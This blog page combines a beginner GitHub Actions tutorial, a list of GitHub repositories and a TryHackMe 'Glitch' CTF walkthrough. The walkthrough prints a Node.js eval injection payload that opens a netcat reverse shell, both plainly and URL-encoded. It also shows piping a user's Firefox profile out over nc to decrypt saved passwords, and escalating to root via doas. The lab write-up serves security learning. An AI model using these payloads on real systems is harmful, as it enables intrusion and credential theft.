Hello Viwers, I am back again with another blog and the topic name is Github Actions CI CD Pipelines WorkFlows. So in this blog we will consider so many thing about CI/CD pipelines workflows like what is Github Actions, how to use - step by step, can i used github actions for CI/CD, A demo workflows file - How to create, run and check results, Terms: Workflows, Events, Jobs, Steps.

Can i used github actions for CI/CD?

Yes, GitHub Actions is commonly used for Continuous Integration (CI) and Continuous Deployment (CD) workflows.

What is Github Actions?

GitHub Actions is an automation platform provided by GitHub that allows you to set up workflows for your software development projects. It enables you to automate various tasks, such as building, testing, and deploying your code directly from your GitHub repository.

Key features of GitHub Actions include:

- Automate SDLC workflows

- Implement CI CD DevOps

Demo

Let's start with the demo how to use github action. Actually you don't got anywhere for using CI/CD, you can use all features in GitHub Action.

Step 1 - Signup and Login to GitHub.com 

Step 2 - Create a new Repository

 Go to this  + Plus button dropdown. Click on new repository.

 Now i will called as github-actions and set as public and click on create repository button (when go to scroll down on same page).

 Step 3 - In the repo create a folder .github/workflows

 here you can either create manually and then commited push to the repository. or you can go to this action tab.

 here you can see the github actions and you can also use templates or use workflows yourself but we will go to setup workflows as yourself.

Step 4 - In the folder create a YAML file with .yml extension

Here this will automatically create .github/workflows folder  and the name of main.yml file but this is empty code. yaml is programming language and .yml this is a file format but particular syntax.

Step 5 - Add the content of the workflow in the file

Now content adding time..

Go to this link and copy the syntax of printing of hello world and you can also use online yaml formater online as a precautions of indentation error.

Hello World - CLICK HERE

YAML Formatter - CLICK HERE

name: hello-world
'on': push
jobs:
  my-job:
    runs-on: ubuntu-latest
    steps:
      - name: my-step
        run: echo "Hello World!"

Certainly! The YAML code you've provided is a simple GitHub Actions workflow. Let's break down each part:

```yaml
name: hello-world
```

This sets the name of your workflow. In this case, it's named "hello-world." This name is just for your reference and doesn't affect the functionality of the workflow.

```yaml
on: push
```

This specifies the event that triggers the workflow. In this case, the workflow will be triggered whenever there is a `push` event to the repository.

```yaml
jobs:
  my-job:
    runs-on: ubuntu-latest
    steps:
```

Here, you define a job named "my-job" that runs on an `ubuntu-latest` virtual machine. This means the steps within this job will be executed on a machine with the latest version of Ubuntu.

```yaml
  - name: my-step
    run: echo "Hello World!"
```

Within the job, you define a step named "my-step." This step uses the `run` key to specify the command that should be executed. In this case, it's a simple command to echo "Hello World!" to the console.

So, when a `push` event occurs in your repository, GitHub Actions will execute this workflow. The workflow consists of one job named "my-job," which runs on an Ubuntu machine. In that job, there's a single step named "my-step" that echoes "Hello World!" to the console.

This is a basic example, and GitHub Actions can be extended to perform more complex workflows, such as running tests, building and deploying applications, and more, depending on the needs of your project.

Step 6 - Commit and push the changes

This should start with github actions workflows.

Step 7 - Go to Repo main page and click "ACTIONS TAB" 

So this is our workflow

Step 8 - Select the workflow from left sidebar and check the logs

Here is the single job ( i have only one thats why)  When we click on this job, here we can see the logs. Here we have a job. 

# First it is setup that will the spin up ubuntu system, as you can see, it is running the ubuntu image (operating system).

# Second this is the actual job. By step here it is running, this comment "echo hello world" which is printing hello world. 

# Third one is completing the job, doing all the cleanup process.

So, This is how it is running ...ummm looking good LOL ;-)

Also if you want to re-run this job, you can also click on it.

You can also check all types of detals like Usage, Workflow file.

Don't forget to explore more things and forget to share....

Disclaimer

Useful Github Repositories

1) Project Based Learning

A list of programming tutorials in which aspiring software developers learn how to build an applications from scratch.

Link - https://github.com/practical-tutorials/project-based-learning

2) Free Programming Books

The Free Ebook Foundation now administers the repo, a not-for-profit organization devoted to promoting the creation, distribution, archiving, and sustainability of free ebooks. Donations to the Free Ebook Foundation are tax-deductible in the US.


This list was originally a clone of StackOverflow - List of Freely Available Programming Books with contributions from Karan Bhangui and George Stocker.

The list was moved to GitHub by Victor Felder for collaborative updating and maintenance. It has grown to become one of GitHub's most popular repositories, with 226,000+ stars, about 9,600 watchers, more than 7,000 commits, 1,900+ contributors, and 47,700+ forks.


Link - https://github.com/EbookFoundation/free-programming-books

3) Developer Roadmap

Roadmaps are being made interactive and have been moved to website.
View all Roadmaps

Here is the list of available roadmaps with more being actively worked upon.

•     Frontend Roadmap
•     Backend Roadmap
•     DevOps Roadmap
•     React Roadmap
•     Angular Roadmap
•     Android Roadmap
•     Python Roadmap
•     Go Roadmap
•     Java Roadmap
•     DBA Roadmap
•     Etc...

Link - https://github.com/kamranahmedse/developer-roadmap




4) Public APIs

A collective list of free APIs for use in software and web development


Link - https://github.com/public-apis/public-apis

Disclaimer

The platform develops virtua l classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

TryHackMe Glitch Walkthrough


While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
  

Good day hacker, Spend more time in the CLI as much as you can, For that’s where we belong.


Glitch is a easy machine from TryHackMe that proves your ability to enumerate quickly and proves the solidification of your methodology.TryHackMe Glitch Walkthrough

Security Problem

The app is vulnerable to command injection/execuiton via the usage of eval. The exploit code can be passed to eval and executed, so the root of the problem is is bad programming practice in Node.js, that allows an unpriviledged user to supply data which will be executed on the server.



Let's start with a quick comprehensive nmap scan

Here we can say that the room will turn around a website as the port 80 is open.

Now let's run gobuster to enumerate all the directories
 

Let’s check what is the content of this website. The page is quite empty, and we can check the source code of the page but it is quite empty as well. For curiosity, I also checked the cookies.

Something looks strange here… The website sent me a cookie with the value “value”, which is weird. Ok, let’s keep it in mind!

Gobuster says that there a directory /secret. Let’ check this page and the source code of the page: 

The page itself doesn’t have a lot of content. However, in the source code we see a JavaScript and a getAccess to an API. Let’s check this:

Hmm interesting! When we check this endpoint, we have a token. It looks encrypted on base64, let’s decrypt it.

Perfect, we have our first flag and a token !

Let’s try to change the value of the cookie with this token and refresh the page:

Amazing! The home page changed as well.

Let’s check the page and its source code:

The page doesn’t have a lot of information but in the source code we can find a JavaScript file => script.js. Let’s check what this script does:

Basically, here the script will take items in the API and show it in the browser. Let’s check those items => http://ipmachine/api/items

 

We don’t have a lot of information here either. I will be clear with you, I got stuck for a while trying to figure out what is the next step.


Finally, I decided to take a hint.

The hint says that we should try another API method.

As a beginner, I never played with API before. So, the only solution was to try to read and learn about API and the way that they work.

Most of the time, an API works with GET, POST, DELETE, and so on. The hint says that we need to play around with those methods.

In order to change the method, I used Burp.

First let’s intercept the request.


Turn Intercept On
 

Go to http://ipmachine/api/items

You can see here that the method is GET. Let’s change GET to OPTIONS, to see all the options that we can use with this API endpoint (send what you intercepted to Repeater):

 

Basically here, we have 3 methods that we can play around with this endpoint: GET, HEAD and POST. We know already the result for GET. We don’t have results for HEAD. Let’s try POST:

Hmm… I think we have something here, right? Someone put intentionally this message there. Maybe we are in the good way.


From here, I needed to read more about APIs and the way that they work. If you are new as me, I will summarize what I learned about it and explain in an easy way:

API

The basic goal of an API is to communicate with another application. In order, to receive an information we use the method GET. However, if we want to send an information, we will use POST method.

A quick example: let’s say we want to buy a BWM car and we go to a website where contains a search bar and we want to send a request to see all the “BMW” cars that they have in stock. Here in this example, their site communicate with another application to show the stock. The value of our search is “BMW” and the name of the variable is “cars”. The request that we will send to this API will look like this:

http://ipmachine/api/items?cars=BMW

 

Good, we know the structure of the request, but we don’t really know what is the POST request that we need to send. We will need to discover what come after “items?” (the variable “cars” in my example). To find out this we can fuzz this request and see the POST responses. In order to this, I will use wfuzz.



PS: Just to illustrate my example, I will put the value that we expect as “bwm”:




wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt -X POST — hh 45 -u http://IPMACHINE/api/items\?FUZZ\=bwm

• · -c: flag is used to show the output in colors
  

• · -z: to specify the payload list.
  

• · — hh 45: When we sent the POST request through burp, we saw that the content length of the “matrix message” was 45. In order to not show anymore this response, I put –hh 45. Basically here, wfuzz will hide all responses containing 45 characters. Indeed, this matrix message doesn’t have any value for us.

• · -u: the url that you need to fuzz.

 

 

Hmm… it looks very good! However, nothing happened to my listener. It looks like the payload didn’t really work but the website says that we exploited the vulnerability. Really weird, right?


But don't let's move to the curl tool

curl -X POST <machine ip>/api/items\?cmd\=ls
 
<title>Error</title>
 
 

So it's a Node.JS. Maybe I can get rce by Node.js eval ...

Reverse shell payload :- Click Here

Node JS Reverse shell payload :- Click Here

cmd=require("child_process").exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.61.234 1234 >/tmp/f ') 

require("child_process").exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.61.234 1234 >/tmp/f ') 

First, I must encode the payload as a URL, and then It's good to go

 %63%6d%64%3d%72%65%71%75%69%72%65%28%22%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%22%29%2e%65%78%65%63%28%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%38%2e%36%31%2e%32%33%34%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66%20%27%29%0a%0a
 

After decoding let's take reverse shell via curl in terminal

This shell is a bit ugly, let’s change it => python3 -c 'import pty;pty.spawn("/bin/bash")'

Let’s find user.txt file. Most of the time, we can find this file in the home directory of the user. Let’s check there first:

Perfect, we just found the second flag. Now we need to find a way to escalate the privilege to get root and then read the file root.txt.

When we visit the home folder, we can see that there is another user: v0id. Let’s check what he has in his folder:

Nothing interesting here…

Let’s list all the users:


 

 We can see here that we have 3 users that we could exploit: user (we exploited already), v0id and root.


Our goal now is to find a way to escalate our privilege:

• · horizontally (to v0id)
• · vertically (to root).

First, let’s try “sudo -l”… It doesn’t work. We need to find another way.


Let’s go back to the user’s home directory and check what is inside:

There is a .firefox directory hidden there. Basically, this directory could contain passwords saved on Firefox Browser. Maybe we can try to find something there.


A few months ago, I read that it is possible to decrypt the content of this file. Let’s transfer this folder .firefox to our machine then decrypt it.


In the target machine, connect back to your machine. In order to do that, go to the /home/user/.firefox then connect back to your machine from there. This will give you access (in your machine) to all the content of .firefox directory.


In the ROOM Machine:


cd /home/user/.firefox



tar cf — .firefox/ | nc IPOfYourMachine 1234

and

in my machine we run a command

nc -lvnp 1234 > out.tar

then, lets extract the file

tar xvf out.tar

Now we need to change the file permission to make it executable.

as you can see our file is extracted here...

In order to find all the hidden information in this directory, we can use a script created by unode => Link GitHub

Github File Here :- Click Here

Clone this script to your machine:

Now let’s decrypt the b5w4643p.default-release file:


our file is glitch-tryhackme inside that's why we used "  ../  "

../.firefox/b5w4643p.default-release

Hmm interesting! Here we can see that the user v0id used this password on the glitch.thm website. Maybe he uses the same password to login in his linux machine? Let’s try to switch to his user:

Good, we just escalated (horizontally) the privileges to v0id user. Now let’s find a way to escalate the privilege (vertically) to the root user.


Let’s check the basic things (as it is an “easy” room) such as: sudo -l, cron jobs, etc/shadow, etc… Nothing special there. I also run linpeas to check if there is something interesting, but I couldn’t find anything. I got stuck here for a while…


Let’s take the last hint of the room: My friend says that sudo is bloat.


I didn’t have any idea what it means, so I googled it and I found this video :



Sudo Is Bloat. Use Doas Instead => Link of the YouTube Video


Basically, doas is a kind of sudo. As we want to have a root shell, we need to execute a command like: sudo -u root /bin/bash. However, if you try with sudo, it doesn’t work.


In the video, it says that we can use doas instead of sudo. So let’s try it:

Finally, we got root. Let’s check the root.txt, most of the time this file is in root folder.
 
 
 

After several hours of trying and error, we finally got the third and last flag! It was not easy at all for me. I needed to search a lot and read a lot. However, I learned a lot!

Things that we could learn during this room:

• · Find information in JavaScript code
•   
  
• · How API works
•  
• · Fuzz an URL with wfuzz
•  
• · RCE through NodeJS
•  
• · Find passwords hidden on Firefox folder.
•  
• · Another alternative for sudo (doas)

In my option, they should change the difficulty of this room. Most of the concepts that we saw during this writeup are not really for beginners. They should change the difficulty to medium (intermediate).

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)